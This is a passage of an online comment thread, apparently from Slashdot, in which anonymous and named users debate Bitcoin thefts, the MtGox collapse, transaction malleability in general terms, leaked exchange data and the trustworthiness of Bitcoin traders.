    1. Re:Different forms, same effect by Anonymous Coward · · Score: 0

      Incorrect.

      "Counterfeit transactions" can't just get free money out of someone - they can confuse some BTC clients into thinking that transaction failed (reference implementation doesn't, IIRC). Making them repeat the transaction is separate step.

      Think someone telling you that check you sent got lost in the mail (and you just trusting and writing a new one).

      PS: MtGox's story sounds like a pile of bullcrap and/or giant incompetency in this regard. Either, not very believable and "That's typical PHP programmer for you!" worthy, their software was automatically resending failed transactions (instead of, you know, *failing* and reporting the fail), nobody audited the logs and nobody did financial audits until they lost an equivalent of half a billion dollars. Or worse, and even less believable - their techsupport resent those transactions and didn't even bat an eyelash until they lost 700kBTC.

  17. Re:This kind of thing is why I got rid of my Bitco by Anonymous Coward · · Score: 0

    After these recent heists about 7% or more of all bitcoin ever mined is controlled by thieves.

  18. Am I the only one laughing? by Anonymous Coward · · Score: 0

    Bitcoin was obviously scamtastic and doomed from the start.

    1. Re:Am I the only one laughing? by Anonymous Coward · · Score: 0

      Son, I ain't laughing. I held some 2900+ Bitcoin in '09. It was worth less than one hundred dollars, TOTAL. I got out way early. Goddamnit

  19. Re: Really??? by Anonymous Coward · · Score: 0

    So hold Bitcoins as money for people that accept Bitcoins as money. Don't exchange your Bitcoins for government backed fiat money.

  20. It's worse when it's bitcoin by Anonymous Coward · · Score: 0

    Except that when this happens to a bank, the money can be more easily traced and recovered.

    The claimed virtues of bitcoin (anonymity, non-reversibility) make these attacks an order of magnitude worse when applied to bitcoin, compared to conventional internet banking.

  21. But the thief _has_ to be near you to steal it. by Anonymous Coward · · Score: 0

    Geographical and physical limitation is key part of most security systems

  22. Coin forgery ... by garyebickford · · Score: 1

    ... has been going on for almost as long as coinage itself. One of the advantages of paper money (in addition to weight, lower manufacturing cost, etc.) is that it can be harder to forge. Any shmuck with a press can create coins that are hard to distinguish from the real thing. On a larger scale, one of the big problems today with gold is people hollowing out gold bars and filling them with tungsten, or starting with tungsten and wrapping a small amount of gold. These are indistinguishable from the real thing, for the non-expert and even for experts without the necessary equipment (and suspicion).

    IANA bitcoin holder, but having looked into the original Nakamoto paper (which is short and much better than any of the derivatives), and discussed this with people who know, the bitcoin methodology or protocol or whatever is with us to stay, and will be used for a lot of things beyond just digital money. The same methodology will be essential for things like secure confirmed transactions between entities far distant from each other (like space stations, moon colonies, etc. - this happens to be one of my interests); it will be used for 'digital contracts' with its internal scripting system, and perhaps even for guaranteed unique digital identity; and it has the powerful feature that it doesn't depend on any external agency - governments or whatever. So bitcoin itself is having growing pains, and it may or may not survive and grow, but don't believe that the methodology won't be an essential part of many future activities.

    --
    It's easier to be a result of the past, but more fun to be a cause of the future! http://www.spacefinancegroup.com/
  23. Re: Publicly available myth by Anonymous Coward · · Score: 0

    Yes, the data is publicly available NOW after it was leaked. duh.

    The trade history at MtGox has always been publicly available. The trade history with user IDs isn't. The complete set of user balances is not publicly available (that data is now available thanks to the leak). The history of BTC deposits and withdraws at MtGox is not available except for the leaked document.

  24. i d by Anonymous Coward · · Score: 0

    " restore those stolen coins to the hands of their rightful owners." -what? I bet you have no idea how bitcoin works :-)

  25. Re:This kind of thing is why I got rid of my Bitco by Bryan+Ischo · · Score: 1

    "legal scammer" is an oxymoron, but I suspect you know that.

    I also suspect that you know there is a real difference between legal forms of investment, with which you will find associated every kind of good and bad person in the world, but predominantly "normal" people availing themselves of opportunities to invest their money as they see fit, and generally with protections and expectations of security that are in the vast majority of cases respected.

    Then you have bitcoin, where you have an extremely high chance that the person on the other end of your transaction is a scammer, unless you know them personally. And where, almost any discussion in any forum invites the participation of every kind of greedy do-nothing imaginable, along with the aforementioned outright thieves and scum.

    I say this from experience. There is almost no aspect to my involvement in bitcoin that wasn't flavored to some degree, usually to a large degree, by the scumminess of the average bitcoin participant.